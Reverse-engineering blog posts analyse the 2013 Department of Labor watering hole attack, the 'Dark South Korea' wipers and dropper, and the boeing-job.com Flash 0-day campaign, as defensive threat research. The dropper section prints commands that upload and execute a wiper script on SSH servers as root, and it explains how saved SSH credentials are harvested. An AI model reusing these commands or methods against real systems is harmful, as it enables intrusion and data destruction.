aka wow on ZATAZ.com
Reverse Engineering
Department of Labor Watering Hole Campaign Review
251 week ago
On April 30th, the watering hole campaign was published on a private mailing list and the May 1st, Invicia and AlienVault publicly reported, with technical details, that United States Department of Labor (DOL) Site Exposure Matrices (SEM) website had been compromised and was hosting malicious code. This malicious code was used in watering hole attack targeting at first employees of US Dept of Energy that work in nuclear weapons programs. This malicious code was also used to gather information’s on the visitors of the compromised website.
The exploit used in this campaign was firstly reported as CVE-2012-4792, an Internet Explorer 0day used in December 2012 in CFR.org watering hole campaign and patched by Microsoft in January 2013. Despite the patch release some forks of this exploit were still used in targeted attacks against political parties, political dissidents, online medias and human right activists.
Two days later, FireEye, Invicia and AlienVault concluded that the vulnerability targeted during this attack campaign was not CVE-2012-4792 as they originally reported but a new Internet Explorer 8 vulnerability identified as CVE-2013-1347. This turnaround had unfortunately occur to late. Casual attacker, chaotic actors, organized crime and potentially other states involved in sponsored espionage had the opportunity to study the attack and recover the evidences.
Microsoft has acknowledge the vulnerability in a Microsoft Security Advisory published on May 3rd and identified as MSA-2847140 and has provide a “Fix it” solution to mitigate Internet Explorer 8 vulnerability.
Also, Adobe has announce through APSA13-03 that a critical vulnerability (CVE-2013-3336) is actually exploited against ColdFusion. This vulnerability could permit an unauthorized user to remotely retrieve files stored on the server, through “CFIDE/administrator“, “CFIDE/adminapi” and “CFIDE/gettingstarted*” directories. Adobe ColdFusion is used by DOL and this vulnerability has surely be used in order to compromise the server.
Possible Causes of Confusion between CVE-2012-4792 and CVE-2013-1347
Confusions with CVE-2012-4792 was possible due to similarities in used code and technics:
Usage of widely used JavaScript functions and variables
“function getCookieVal(offset)“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
“function GetCookie(name)“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
“function SetCookie(name,value)“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
“var ua = window.navigator.userAgent.toLowerCase()“, widely used, is also present in original CVE-2012-4792 exploit and other forks.
Usage of particular JavaScript functions also present in previous watering hole campaigns
“function DisplayInfo()” also seen in CVE-2012-4792 & CVE-2011-0611 exploits.
“function download()” & “function callback()” also seen in CVE-2012-4792 exploit.
Usage of Ajax XMLHttpRequest
This JavaScript object is used to download “bookmark.png” file and was also used to download ”xsainfo.jpg” file in CVE-2012-4792.
Similarities in the JavaScript code structure
If you compare the original CVE-2012-4792 JavaScript code and Exodus Intel fork, with this new exploit, the code structure is very similar in many aspects.
Usage of HTML+TIME technic
HTML+TIME, which is based on the Synchronized Multimedia Integration Language (SMIL), was also used in certain CVE-2012-4792. This technic was explained by Exodus Intel beginning January 2013.
Target selection
Parts of the code targets only Windows XP, Internet Explorer 8 and certain languages, like CVE-2012-4792.
Differences between CVE-2012-4792 and CVE-2013-1347, and Particularities
Some new particularities were present in the exploit and associated watering hole campaign:
Usage of PHP files
All previous watering hole attacks have use HTML or JavaScript files. PHP usage naturally limit the number of potential servers who could be used to start the exploitation and spread the malware. This approach increasingly the technic used by Exploit Kits, maybe a source of inspiration and effectiveness for states involved in sponsored espionage.
Usage of Base64 obfuscation
Obfuscation with base64 encoding (“base64.js” file) was used to hide parts of the exploit. CVE-2012-4792 was using “robots.txt” obfuscated with substitutions and HEX encoding.
Use-After-Free type
As mentioned by sinn3r of Metasploit team, CVE-2012-4792 was a CButton object use-after-free and CVE-2013-1347 is a CGenericElement object use-after-free.
dol[.]ns01[.]us Exploit Hosting Domain Evolutions
Invicia and AlienVault have report that the browser was redirected to the content hosted at dol[.]ns01[.]us which lead to the infection. A urlQuery, of 2013-05-01, is mentioned and refer to dol[.]ns01[.]us on port 8081/TCP. One hit related to the information gathering script is mentioning a last modified date of Thu, 14 Mar 2013 20:06:36 GMT. You can also observe in the executed JavaScript that the hxxp://dol[.]ns01[.]us:8081/web/js.php and hxxp://dol[.]ns01[.]us:8081/web/css.js URL’s are present in the code.
But if you take a look to a previous urlQuery report of 2013-04-29, hxxp://96[.]44[.]136[.]115/web/js.php, hxxp://96[.]44[.]136[.]115/web/css.js and hxxp:///web/xss.php are mentioned and coded in the executed JavaScript. 96[.]44[.]136[.]115 IP address is mentioned by AlienVault as the IP address behind dol[.]ns01[.]us. As you can see no specific destination port is present and the last modified date is the same. So we can conclude that the guys behind this campaign have change the malicious code during this interval.
You can observe this evolution with the urlQuery submission of 2013-04-30.
All these urlQuery submission’s were done with a non Internet Explorer 8 user agent, and as the exploit malicious code was designed to only target Windows XP and Internet Explorer 8, part of the redirection were not present as evidences.
If you observe “/scripts/textsize.js” JavaScript code hosted on DOL website, you can see a first JavaScript inclusion to “hxxp://dol[.]ns01[.]us:8081/web/xss.php” and a second one to “hxxp://dol[.]ns01[.]us:8081/update/index.php“.
The first inclusion “/web/xss.php” was used in order to gather information’s on the DOL website visitors and the second inclusion “/update/index.php” was used to start the exploitation of CVE-2013-1347.
Information Gathering Scripts
As described by AlienVault, the information gathering code “/web/xss.php” on dol[.]ns01[.]us use different JavaScript functions to collect information’s from the system and upload the result to the malicious server.
I found that the information’s gathering script was different depending on the used browser. Here under a description of the JavaScript functions involved in information’s gathering depending on used browsers.
DOL Information Gathering Functions
JavaScript Function(s) | Targeted Browser(s) | Function Description |
|---|---|---|
| jstocreate() | Internet Explorer | Test the presence of the Avira, Bitdefender 2013, McAfee VirusScan Enterprise, AVG Secure Search, ESET NOD32, Dr.Web, Microsoft Security Essentials, Sophos, F-Secure Antivirus 2011, Kaspersky 2012, Kaspersky 2013 anti-viruses. |
| flashver() | Internet Explorer & Firefox & Chrome | Test the presence and version of Adobe Flash, and supported OS. |
| officever() | Internet Explorer | Test the presence and version of Microsoft Office |
| plugin_pdf_ie() | Internet Explorer | Test the presence of Adobe Reader |
| bitdefender2012check() | Internet Explorer & Firefox & Chrome | Test the presence of BitDefender 2012 and try to disable it through disabledbitdefender_2012() function. |
| java() | Internet Explorer & Firefox & Chrome | Test the presence and version of Oracle Java plug-in |
| xunleicheck() | Firefox & Chrome | Test the presence of xThunder Chrome extension, an extension managing popular downloaders. |
| kavcheck() | Firefox & Chrome | Test the presence of Kaspersky Chrome extension |
| fiddlercheck() | Firefox & Chrome | Test the presence of Fiddler Chrome extension. Fiddler is an HTTP debugging proxy server application |
| liveheadercheck() | Firefox & Chrome | Test the presence of Live HTTP Header Chrome extension |
| webdevelopercheck() | Firefox & Chrome | Test the presence of Web Developer Chrome extension |
| avg2012check() | Firefox & Chrome | Test the presence of AVG 2012 Chrome extension |
| tamperdatacheck() | Firefox & Chrome | Test the presence of Tamper data Chrome extension |
| adblockcheck() | Firefox & Chrome | Test the presence of Adblocker Chrome extension |
| avastcheck() | Firefox & Chrome | Test the presence of Avast! Chrome extention |
| pluginverother() | Firefox & Chrome | Test the presence of all installed modules |
Also a specific information gathering technic was triggered when Internet Explorer was used. This technic is related to a non patched vulnerability in Internet Explorer 8, discovered by NSFOCUS and reported to Microsoft in 2011. The vulnerability could allow user information and even local file content leakage if a user views a specially crafted webpage using Internet Explorer.
Once all information’s gathered, the script send all data’s on a specific URL “hxxp://dol[.]ns01[.]us:8081/web/js.php” and also call “hxxp://dol[.]ns01[.]us:8081/web/css.js” when the information’s are collected.
An interesting information regarding “/web/css.js“, is that the “Last Modified” date reported by “dol[.]ns01[.]us” server is Thu, 14 Mar 2013 20:06:36 GMT. This is reporting that the information gathering infrastructure was in place since mid-March minimum.
Interesting facts regarding these information gathering scripts are:
- Scripts “xss.php“, “js.php” & “css.js” have move from IP 96[.]44[.]136[.]115 on port 80/TCP to domain dol[.]ns01[.]us port 8081/TCP. Move from port 80/TCP to 8081/TCP doesn’t seem to be logic, most of time outgoing connexion’s authorized on Firewalls, for corporate Web surfing, are 80/TCP and 443/TCP.
- Different types of information gathering scripts were in place, and all users who have visit DOL website were affected by this information gathering campaign.
- Usage of a specific information leakage vulnerability present in Internet Explorer 8 and not fixed by Microsoft.
- BitDefender 2012 deactivation attempt is confusing. Why trying to deactivate an anti-virus, this will surely generate an alert.
Information Gathered on dol[.]ns01[.]us
As described in the previous chapter, the information gathering code send a lot of information’s to the backend. Hopefully for security researchers, the backend wasn’t very well protected and all collected information’s were accessible without any restrictions in different web folders. You can find here under some statistics related to the gathered information’s.
Complete geolocation of the targeted source IPs
By analyzing the information’s sent to the backend, we can also see that DOL (www.sem.dol.gov) wasn’t the only compromised website:
- From 2013-03-15 to 2013-04-29 : University Research Co. Cambodia website (www.urccambodia.org) was the first target .This explain the high number of distinct IP addresses from Cambodia.
- From 2013-04-08 to 2013-04-24 : Awards for Excellence in Education website (www.forexcellenceineducation.org), a program of Fraser Institute, was the second target.
- From 2013-04-08 to 2013-04-24 : ElectionGuide website (www.electionguide.org), provided by the International Foundation for Electoral Systems (IFES), was the third target.
- From 2013-04-09 to 2013-04-30 : French Institute of International Relations website (www.ifri.org), was the fourth target.
- From 2013-04-09 to 2013-04-24 : The Working for America Institute website (www.workingforamerica.org), was the fifth target.
- From 2013-04-09 to 2013-04-10 : The Project 2049 Institute website (www.project2049.net), was the sixth target.
- From 2013-04-10 to 2013-04-10 : The Union Label and Service Trades Department website (www.unionlabel.org), was the seventh target.
- From 2013-04-11 to 2013-04-30 : Thales Catalogue website (components-subsystems.thales-catalogue.com), was the eighth target.
- From 2013-04-23 to 2013-05-01 : United States Department of Labor (DOL) Site Exposure Matrices (SEM) website (www.sem.dol.gov), was the ninth target.
Here under the hits by browsers and Internet Explorer 8 hits by OS.
Others Information’s Gathered
As you have read in the previous chapter, ElectionGuide website (www.electionguide.org) was also targeted during this watering hole campaign. As you can see in the following urlQuery submission, dating from 2013-05-01, 96[.]44[.]136[.]115 is also present but don’t respond any more. Also if you observe the urlQuery submission of 2013-05-03, 96[.]44[.]136[.]115 is still present, but a new backend server has been setup in order replace the once deactivated.
If you observe the “Last Modified” date of “css.js” file, the installation date of these files is at least the 2013-05-03.
Also, by researching some patterns matching the information’s gathering script on Google you can find some previous unknown campaigns, that were using the same code.
Dark South Korea and Discovered PuTTY Tools Behaviours
331 month ago
By analyzing one of the Dark South Korea dropper, I discovered interesting behaviours associated with the PuTTY binaries installed in “%TMP%” Windows folder. These behaviours could be considered as expected, but they could be used more efficiently in the future.
The two installed binaries are “alg.exe“ and “conime.exe“ used to upload “~pr1.tmp” bash file to *NIX targets discovered in configuration files of mRemote and SecureCRT.
“alg.exe“ is “plink.exe“ a PuTTY tool acting as a command-line interface to the PuTTY back ends, and “conime.exe” is “pscp.exe” PuTTY tool acting as a SCP client, i.e. command-line secure file copy. These two binaries are legit and don’t contain any associated malwares, they are only used by a malware as support tools.
If mRemote is installed, the dropper extract all required information’s (credentials, ports, ip/domain) from “confCons.xml” configuration file, and use an encryption method vulnerability in mRemote to decrypt it the stored password. After exploitation of the vulnerability, “conime.exe” is used to drop the bash file on the targeted servers.
If the latest version of SecureCRT is installed, the dropper extract all required information’s (credentials, ports, ip/domain) present in “*.ini” configuration files. Each saved connection in SecureCRT use it ones “*.ini”. It seem that an unknown vulnerability was present in previous versions of SecureCRT in order to decrypt the stored password. But in the latest version of SecureCRT, this vulnerability don’t seem to be present. So when “conime.exe” try to connect to the targeted servers the authentication fails due to a bad password.
During my research on the potential SecureCRT vulnerability, I was intrigued by “conime.exe” by access tentatives to the registry keys of PuTTY software “HKCU\Software\SimonTatham\PuTTY\Sessions” and “HKCU\Software\SimonTatham\PuTTY\SshHostKeys“.
I decided to install PuTTY, like a majority of sysadmin’s, and create an entry corresponding to potential server also recorded in SecureCRT software.
Then I execute the dropper one more time and discovered that “conime.exe“, as expected, has access the PuTTY registry keys related to the targeted server “HKCU\Software\SimonTatham\PuTTY\Sessions\192.168.178.54“. The dropper authentication tentative was still unsuccessful, du to the wrong password.
But I also observed that “conime.exe” was also trying to access another registry key of PuTTY “HKCU\Software\SimonTatham\PuTTY\SshHostKeys\rsa2@22:192.168.178.54“.
I decided then to create a private and public SSH key, and to configure my putty session to support this SSH private key authentication. The private key wasn’t protected by a passphrase.
I execute the dropper one more time and observed a successfull authentication on the targeted server. “conime.exe” was using the private key path present in PuTTY registry key.
My final test was to remove the private key from the PuTTY configuration and use “pageant.exe“, an SSH authentication agent for PuTTY, PSCP, PSFTP, and Plink. I loaded my private key in “pageant.exe” and executed the dropper one more time. Same result as the previous one, a successfull authentication on the targeted server.
Conclusions
- By analyzing one of the Dark South Korea dropper, with associated vulnerabilities in mRemote and SecureCRT, we can observ that the “bad guys” have use old vulnerabilities in old softwares in order to infect *NIX servers. Why use these old vulnerabilities, if you can simply target PuTTY when it is used with private keys.
- Never generate a private key without a passphrase
- Don’t let PuTTY Pageant run with charged private keys.
Dark South Korea Total War Review
291 month ago
As mentioned by different medias, security vendors and security researchers some South Korean banks and broadcasting organizations went dark Wednesday 20 March, victim of a cyber attack. Initial impacted broadcaster were KBS, MBC and YTN, and impacted banks were Cheju, Nonghyup and Shinhan.
But by analyzing all the events related to this cyber attack we can see that the campaign was more extended in time as mentioned and also more complex to understand. The campaign is composed by different samples, created potentially by different authors with different objectives. We can divide the reported samples in different categories:
- Wipe: Objective of these samples is to erase all data’s of affected targets.
- Drop & Wipe: Objective of these samples is to drop a wiper to erase all data’s of affected targets.
- Drop & Wipe & Deface: Objectives of these samples are to drop a wiper to erase all data’s and deface website hosted by affected targets.
- Drop & Backdoor: Objective of these samples is to install a backdoor, or trojan, on the affected targets.
- Unknown: These samples are potentially not related to the campaign.
I will try, through this blog post, to provide you the most reliable information’s as possible regarding the Dark South Korea campaign.
According to different sources, and announced by the South Korean security provider AhnLab the Thursday 21 March, “bad guys” got access to AhnLab Policy Center and HAURI ViRobot ISMS, asset management tools, through stolen credentials in order to massively spread Trojan.Jokra. But, regarding the latest news announced the 29 March, it seem that AhnLab APC product was vulnerable to a login authentication bypass and that this vulnerability was used by the bad guys in order to get access to APC and spread the malware.
On Wednesday 20 March, AhnLab stocks gains of 6.5 percent (75,100 KW to 80,000 KW) from stemming from expectations of demand for online security software following the hacking incident. But after the 21 March AhnLab announcement, stocks were down 3.6 percent (from 80,000 KW to 74,700 KW). Since 21 March, AhnLab stocks have fallen from 74,700 KW to 68,100 KW.
AhnLab Stocks. Source: Korea Exchange
KCC reported that around 47 800 units were impacted by this cyber attack. You will find in the following graphical representation of known impacts. This graphical representation has been inspired by the work of @piyokango, a must read blog post !
Also translated from @piyokango work, the associated event timeline. Through this timeline you can better understand all the actors and impacts involved in this cyber attack.
Dark South Korea Events Timeline
Date | Time | Event |
|---|---|---|
| Date | Time | Event |
| 3/20 | At around 2pm | Financial and broadcasting organizations computers stop suddenly and cannot restart |
| 2:25pm | KCC start to receive incident reports | |
| 2:35pm | KCC & KISA confirm outages on financial and broadcasting organizations | |
| 2:40pm | YTN TV report the incidents | |
| 2:50pm | South Korea presidence acknowlege the incidents | |
| 3pm | KISA raise his alert level | |
| 3:05pm | NongHyup Bank initiate blocking measures | |
| At around 3pm | Shinhan bank central server is down | |
| At around 3pm | Cyber police announce the possibility of an attack and start the investigation | |
| 3:10pm | South Korean army raise his alert level | |
| 3:20pm | Shinhan bank business recovery | |
| 4:20pm | NongHyup bank business recovery | |
| At around 4pm | MBC TV internal network reported as impacted | |
| At around 4pm | Extended opening hours after 6pm for banks | |
| 5:49pm | AhnLab anti-virus engine is updated | |
| 6:40pm | AhnLab distribute counter measures | |
| At around 9pm | KBS internal information system reported as impacted | |
| 3/21 | 6:30am | MBC Gyeongnam TV internal network is stopped |
| 7:25am | KBS TV internal network business recovery, except for PC's | |
| 11:30am | KCC chairman visit KISA | |
| At around 5pm | 16 NongHyup bank offices still not able to recover | |
| 3/22 | At around 6am | 87% of NongHyup bank cooperatives and 78% of they're ATM's have been recovered |
| At around 3pm | KCC report that China attribution was a mistake. | |
| 3/24 | At around 6pm | NongHyup bank add some additional counter measures |
| NongHyup bank full business recovery | ||
| 3/25 | At around 6am | NongHyup bank segregate internal and external network (lol) |
| 10:30am to 1:45pm | Time zone attacks reported and security warning raised by AnhLab | |
| International cooperation requested for investigations | ||
| 3/26 | 9:21am | Additional counter measures provided by AhnLab |
| 9:40am | 6 YTN TV affiliates overloaded by traffic | |
| 10:40am | Network overload disrupting 8 municipalities web sites (Seoul, Gyeonggi, Incheon, Gwangju, Jeonnam, Jeonbuk, Gangwon, Jeju). | |
| 11:22am | Network overload disrupting 7 South Korean regions. | |
| 11:50am | Military experts join the public-private incident response task force | |
| 00:04pm | Network failure recovery | |
| 01:40pm to 02:30pm | Daily NK web site disrupted and posts deleted | |
| Free North Korea TV web site disrupted | ||
| 02:00pm to 02:15pm | Ministries web site disrupted | |
| 02:30pm to around 05pm | Other North Korean activists web sites disrupted | |
| 3/27 | - | The Financial Services Commission announce special inspections on targeted financial institutions |
| 3/28 | - | YTN TV web site recovery |
| 3/29 | 11:09am | AhnLab announce that APC was vulnerable to a authentication bypass weakness |
| - | Response Team announce return to normalization |
The actual investigation results point that foreign source IPs ( 3 european countries and US, but not China) were discovered as potential source of the attack, and that a potential of 14 variants of the malware were discovered and analyzed.
Security firm Xecure Lab has provide some information’s regarding Dark South Korea, malwares hash are available with some detailed analysis. Also malwares samples were available on private groups and on contagio. Based on these hashes and samples, you can find here under an analysis.
Samples Analysis
Presumed Dropper(s)
| MD5 | 9263E40D9823AECF9388B64DE34EAE54 |
| Size | 417.5 KB |
| Compilation timedatestamp | 2013-03-20 04:07:02 |
| Modify Date | None |
| File mapping object | None |
| Resource language(s) | English & Korean |
| Strings | N/A |
| URL | None |
| Other names | APCRunCmd.DRP - K10 |
This executable drop “AgentBase.exe” (db4bbdc36a78a8807ad9b15a562515c4), “alg.exe” (e45cd9052dd3dd502685dfd9aa2575ca), “conime.exe” (6a702342e8d9911bde134129542a045b) and “~pr1.tmp” (dc789dee20087c5e1552804492b042cd) in “%TMP%“, then execute “AgentBase.exe“. Remarks: Also known as K10 by Xecure Lab, mentioned as a wiper, but it is a dropper. This sample could be categorized as Drop & Wipe.
Also, dropped “AgentBase.exe” is known as K01 on Xecure Lab, mentioned as a wiper only. “AgentBase.exe” is a Windows wiper, but also the dropper for *NIX batch wiper aka “~pr1.tmp“. More information’s in the “9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis” chapter of this blog.
| MD5 | 50E03200C3A0BECBF33B3788DAC8CD46 |
| Size | 24 KB |
| Compilation timedatestamp | 2012-07-06 12:24:18 |
| Modify Date | None |
| File mapping object | FFFFFFF-198468CD-6937629023-EF90000000 |
| Resource language(s) | None |
| Strings | hello |
| URL | hxxp://www.skymom.co.kr/rgboard/addon/update/update_body.jpg |
| Other names | K06 |
It seem that “update_body.jpg” (a03ae3a480dd17134b04dbc5e62bf57b), first seen the 2012-08-28 04:31:52, is the same as mentioned on SCUMWARE the 2012-08-30. You can find this sample on malware.lu. Symantec and McAfee have try to create a relation based on the used packer and on some common compilation paths. But like McAfee, I don’t see any relations between this dropper and the 03.20 Dark South Korea campaign. Known as K06 on Xecure Lab. This sample could be categorized as Drop & Backdoor, or Unknown.
| MD5 | E4F66C3CD27B97649976F6F0DAAD9032 |
| Size | 24 KB |
| Compilation timedatestamp | 2012-07-06 12:24:18 |
| Modify Date | None |
| File mapping object | FFFFFFF-198468CD-6937629023-EF90000000 |
| Resource language(s) | None |
| Strings | hello |
| URL | hxxp://www.anulaibar.com/e107/e107_files/js/e107_001.cab |
| Other names | K05 |
Here also, I don’t see any relations between this dropper and the 03.20 Dark South Korea campaign. Known as K05 on Xecure Lab and mentioned by McAfee. This sample could be categorized as Drop & Backdoor, or Unknown.
| MD5 | 2F9AF723E807FF44C2684E5D644EBE46 |
| Size | 38.8 KB |
| Compilation timedatestamp | None |
| Modify Date | 2013:03:17 23:41:07 |
| File mapping object | None |
| Resource language(s) | None |
| Strings | None |
| URL | None |
| Other names | 고객계좌내역.rar - K08 |
Known as K08 on xsecure-lab.com, and like the guys of Xecure Lab. I don’t see any relations between this dropper and the 03.20 Dark South Korea campaign. F-Secure has try to link this sample to the campaign. This sample could be categorized as Unknown.
| MD5 | 530c95eccdbd1416bf2655412e3dddb |
| Size | Unknown |
| Compilation timedatestamp | Unknown |
| Modify Date | None |
| File mapping object | Unknown |
| Resource language(s) | Unknown |
| Strings | HASTATI. / PR!NCPES and other unknowns |
| URL | Unknown |
| Other names | Unknown |
This sample was mentioned by Symantec and AhnLab the 23 March. Particularities of this sample is that he will drop 2 files and inject 1 the files into “LSASS.exe” process as a DLL. Also this sample will be executed any years the 20 March at 2pm and wipe MBR with “HASTATI.” and “PR!NCPES” strings. Unfortunately I wasn’t able to find this sample. This sample could be categorized as Drop & Wipe.
| MD5 | e823221609b37e99fbbce5b493a02f68 |
| Size | 236.0 KB |
| Compilation timedatestamp | 2013-03-19 23:57:06 |
| Modify Date | None |
| File mapping object | None |
| Resource language(s) | Korean |
| Strings | MICRO_ESENCIAL0192301 / Alerter / Sens / Hacked By Whois Team / morpsntls.exe / and bunch of others |
| URL | None |
| Other names | cmsvrts.exe / K07 |
This sample was also mentioned the 20 March by different medias, security vendors and researchers. He was used to against LG UPlus Corp showed a page that said it had been hacked by a group calling itself the “Whois Team“.
Particularities of this sample is that he seem to be triggered only in certain conditions, and this condition seem to be related to certain time zone, as mentioned by AhnLab the 23 March. The sample drop “mp.swf“, “lf.mp3“, “24mhk04.gif“, “25z18pg.jpg” files, adds “MICRO_ESENCIAL0192301” as mutex, modify the “SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management“ following registry entries, overwrite all “.html“, “.htm“, “.aspx“, “.asp“, “.jsp“, “.do“, “.php” files with its code, terminate Windows Alerter service (Alerter) and Windows System Event Notification Service (Sens), and drop all the MBR datas. This sample could be categorized as Drop & Wipe & Deface.
Presumed Wiper(s)
Symantec, Tripwire, Xecure Lab and contagio reported hashes of different wipers. Here under an analysis of these wipers with some corrections.
| MD5 | 0a8032cd6b4a710b1771a080fa09fb87 |
| Size | 24 KB |
| Compilation timedatestamp | 2013-01-31 10:27:18 |
| File mapping object | JO840112-CRAS8468-11150923-PCI8273V |
| Strings | PR!NCPES / HASTATI. / \Temp\~v3.log |
| Check "~v3.log" | No |
| Task kill | pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot) |
| Wiper timing | Immediate |
| Shutdown | shutdown -r -t 0 |
| Other names | mb_join.gif / mb_join.exe / K03 |
| Mentioned by | contagio & Symantec |
Despite file “~v3.log” is present in “C:\WINDOWS\Temp\” directory, the wiper is running directly. This sample could be categorized as Wiper.
| MD5 | 5fcd6e1dace6b0599429d913850f0364 |
| Size | 24 KB |
| Compilation timedatestamp | 2013-01-31 10:27:18 |
| File mapping object | JO840112-CRAS8468-11150923-PCI8273V |
| Strings | HASTATI. |
| Check "~v3.log" | No |
| Task kill | pasvc.exe (AhnLab Policy Agent) / Clisvc.exe (Hauri ViRobot) |
| Wiper timing | Immediate |
| Shutdown | shutdown -r -t 0 |
| Other names | AmAgent.exe / OthDown.exe / K04 |
| Mentioned by | contagio & Symantec & Tripwire |
This sample could be categorized as Wiper.
| MD5 | db4bbdc36a78a8807ad9b15a562515c4 |
| Size | 24 KB |
| Compilation timedatestamp | 2013-01-31 10:27:18 |
| File mapping object | JO840112-CRAS8468-11150923-PCI8273V |
| Strings | PRINCPES / HASTATI. / \Temp\~v3.log |
| Check "~v3.log" | Yes |
| Task kill | pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot) |
| Wiper timing | Not immediate if ~v3.log is present |
| Shutdown | shutdown -r -t 0 |
| Other names | ApcRunCmd.exe / K01 |
| Mentioned by | contagio & Symantec & Tripwire |
This sample is taking care of the ”~v3.log” presence in ”C:\WINDOWS\Temp\” directory. If the file is present the wipe process is not started. This sample could be categorized as Wiper.
But you have to take in consideration that this sample is normally executed by 9263E40D9823AECF9388B64DE34EAE54 dropper, and that a complete process will be analyzed in the ”9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis” chapter of this blog.
| MD5 | f0e045210e3258dad91d7b6b4d64e7f3 |
| Size | 24 KB |
| Compilation timedatestamp | 2013-01-31 10:27:18 |
| File mapping object | JO840112-CRAS8468-11150923-PCI8273V |
| Strings | PRINCPES / HASTATI. / \Temp\~v3.log |
| Check "~v3.log" | Yes |
| Task kill | pasvc.exe (AhnLab Policy Agent) / clisvc.exe (Hauri ViRobot) |
| Wiper timing | Not immediate if ~v3.log is present |
| Shutdown | shutdown -r -t 0 |
| Other names | ApcRunCmd.exe / K02 |
| Mentioned by | contagio |
Like the previous wiper, if ”~v3.log” is present in ”C:\WINDOWS\Temp\” directory, the wipe process is not started.
This sample seems also to be part of a another dropper actually not publicly known. This sample could be categorized as Wiper.
As you can see, all of the wipers use the “HASTATI” string in order to overwrite MBR data’s. As reported by security vendors, “Hastati” term refers to a class of infantry in the armies of the early Roman Republic. “PRINCPES” term, also used to overwrite MBR data’s, could also refer to the “Principes” who were veteran soldiers of the Roman Pre-Marian Army. Are the “bad guys” fan of Roman Army, or fan of Total War game ?
Also an interesting relation between the “HASTATI” string used to overwrite MBR data’s, is that KBS TV website was defaced the 21 March with a “Defaced by HASTATI” message and symbol representing the class of infantry in the armies of the early Roman Republic.
9263E40D9823AECF9388B64DE34EAE54 Dropper Analysis
In this chapter of this long blog post we will analyze some behaviors of 9263e40d9823aecf9388b64de34eae54 dropper.
As mentioned by different security vendors or researchers, when executed the dropper will extract 4 files into Windows “%TMP%” directory. These files are “alg.exe“, “conime.exe“, “~pr1.tmp” and “AgentBase.exe“.
“alg.exe” (e45cd9052dd3dd502685dfd9aa2575ca) is the “plink.exe“ PuTTY tool acting as a command-line interface to the PuTTY back ends. This binary has been compiled the 2013-02-15 at 08:12:58.
“conime.exe” (6a702342e8d9911bde134129542a045b) is the “pscp.exe” PuTTY tool acting as a SCP client, i.e. command-line secure file copy. This binary has been compiled the 2006-03-13 at 14:32:44.
“~pr1.tmp” (dc789dee20087c5e1552804492b042cd) is a bash script who will be dropped and executed on *NIX servers in certain conditions.
“AgentBase.exe” (db4bbdc36a78a8807ad9b15a562515c4) is the wiper mentioned in the previous chapters of this blog post.
After installing these files, the dropper will check the presence of “~v3.log” file in “C:\WINDOWS\Temp\” directory.
If the file “~v3.log“ is not existing “AgentBase.exe” wiper will be executed, killing AhnLab Policy Agent (pasvc.exe) and Hauri ViRobot ISMS Client (clisvc.exe), then erasing all data’s.
If the file ”~v3.log” is existing, the dropper start to check the presence of configuration file “confCons.xml” of mRemote program, developed by Felix Deimel, and the presence of configuration files of SecureCRT program, developed by VanDyke Software, Inc.
For mRemote, the dropper copy all data’s, related to SSH connexions with root login, present in “confCons.xml” configuration file and exploit a vulnerability present in the password storage engine of this program. When you save connections in mRemote it outputs all of that data into an XML report “confCons.xml“. The passwords are saved in an encrypted format, however this is trivial to circumvent. So despite the passwords are saved in encrypted format it is easy to decrypt them. This vulnerability was discovered and published by Cosine Security the 2 Jun 2011. Support of mRemote has been stopped in 2012.
Once the mRemote vulnerability is exploited, the dropper start a new process to execute “conime.exe” binary, in order to drop the “~pr1.tmp” file into “/tmp/cups” on the targeted server:
“C:\Users\ERICRO~1\AppData\Local\Temp\conime.exe -batch -P 22 -l root -pw test C:\Users\ERICRO~1\AppData\Local\Temp\~pr1.tmp 192.168.178.54:/tmp/cups”
After upload of “cups” file, the dropper will execute this file through the following command.
“C:\Users\ERICRO~1\AppData\Local\Temp\conime.exe -batch -P 22 -l root -pw test 192.168.178.54 “chmod 755 /tmp/cups;/tmp/cups”
For SecureCRT, the dropper is also copying all data’s, related to SSH connexions with root login, present in “*.ini” configuration files. Each saved connection in SecureCRT as it ones “*.ini” file who will be parsed by the dropper. The passwords are also saved in an encrypted format.
With the latest version of SecureCRT (7.0.3), the dropper is unable to decrypt the password, but will try to connect to targeted servers with a wrong password. So there is surely a similar vulnerability as for mRemote in previous versions of SecureCRT, but wasn’t able to find it.
Boeing-job.com Campaign and Adobe Flash 0days Additional Informations
33 months ago
The 7 February, Adobe has issue security bulletin APSB13-04 for Adobe Flash Player, in order address two vulnerabilities, CVE-2013-0633 and CVE-2013-0634, exploited in the wild.
CVE-2013-0633 (CVSS base score of 9.3) is exploited by tricking a Windows user to open a Microsoft Word document containing a malicious Flash content. CVE-2013-0634 (CVSS base score of 9.3) is exploited by tricking an Apple OS X user to open a web page, containing a malicious Flash content, through Firefox or Safari. But this vulnerability is also exploited by tricking a Windows user to open a Microsoft Word document containing a malicious Flash content.
Affected products are :
- Adobe Flash Player 11.5.502.146 and earlier versions for Windows and Macintosh
- Adobe Flash Player 11.2.202.261 and earlier versions for Linux
- Adobe Flash Player 11.1.115.36 and earlier versions for Android 4.x
- Adobe Flash Player 11.1.111.31 and earlier versions for Android 3.x and 2.x
These vulnerabilities were discovered exploited in the wild:
- For CVE-2013-0633, by Sergey Golovanov and Alexander Polyakov of Kaspersky Labs
- For CVE-2013-0634, by Shadowserver Foundation, MITRE and Lockheed Martin CIRT
As described by Alienvault Labs and by FireEye, the vulnerabilities were exploited through spear phishing email messages targeting several industries including the aerospace one. One of the e-email attached file was using the 2013 IEEE Aerospace Conference schedule, and another reported sample was related to online payroll system of ADP US company.
Detailed analysis have been provided by Alienvault Labs, FireEye and Malware Must Die. All the analysis reported the following domain name ieee[.]boeing-job[.]com as C&C server.
boeing-job[.]com domain name was registered the 22 January 2013, through GoDaddy, with fake registration information’s.
The 5 February http://ieee[.]boeing-job[.]com sub domain was pointing to IP 108.62.10.13, AS15003 in US.
The 6 February http://boeing-job[.]com was pointing to IP 184.168.221.37, AS26496 in US, parking web page of GoDaddy.
But, they’re is always a but, if you take a look in Google you can find the IP address who was used for www.boeing-job[.]com.
This sub domain was pointing to a legit website http://www[.]grupo-gestion[.]com[.]ar, IP 200.123.160.138, AS16814 in Argentina.
